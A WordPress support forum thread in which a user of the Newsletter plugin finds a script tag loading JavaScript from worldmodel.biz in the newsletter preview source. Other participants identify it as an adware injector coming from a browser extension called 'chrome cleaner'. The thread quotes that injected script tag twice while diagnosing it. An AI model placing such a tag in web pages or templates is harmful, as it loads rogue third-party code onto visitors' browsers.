Support » Plugin: Newsletter » Sécurity issue ?

  • Resolved John

    (@groupewibi)


    Hello to all,

    I have configured the newsletter plugin, and i used the wysiwyg to create my templates.
    Just to check i did convert them in HTML, and i seeing strange thinks in the code of the newsletter. Is this normal or the newsletter plugin has been hacked ?

    In the newsletter Html View, i seeing a lot of data-json scripts attached to all table.
    <table type="options" data-json="eyJibG9ja19wYWRk ....

    and when im viewing the source code when im viewing the newsletter i have this :
    <script type="text/javascript" async="" src="//worldmodel.biz/2241c61e4c10670366.js"></script>

    I just have put below some screenshot from inside the newsletter plugin, and from code viewing when we preview the newsletter.
    Picture 1 : https://ibb.co/HHmz2Ff
    Picture 2 : https://ibb.co/9hvkHbh

    • This topic was modified 1 month, 2 weeks ago by John.

    The page I need help with: [log in to see the link]

Viewing 6 replies - 1 through 6 (of 6 total)
  • Plugin Author Stefano Lissa

    (@satollo)

    the data-json is the block configuration. it’s stripped away when you send the newsletter.

    Stefano.

    John

    (@groupewibi)

    Thank you Stephano for the answer.

    What about the script worldmodel.biz ? Is it also normal ?

    John

    That file is Adware JS Injector. Not sure if it comes from the plugin though but it certainly is injecting rogue ads.

    <script type="text/javascript" async="" src="//worldmodel.biz/2241c61e4c10670366.js"></script>

    John

    (@groupewibi)

    OK. Dang. Thank you for your help.
    Best.

    cecilboye

    (@cecilboye)

    I had the same problem and i found the issue. It’s not a WordPress plugin but a browser extension. For me it was a chrome extension called “chrome cleaner”. I hope it helps.

    John

    (@groupewibi)

    Yes. It was it .. “chrome cleaner”

Viewing 6 replies - 1 through 6 (of 6 total)
  • You must be logged in to reply to this topic.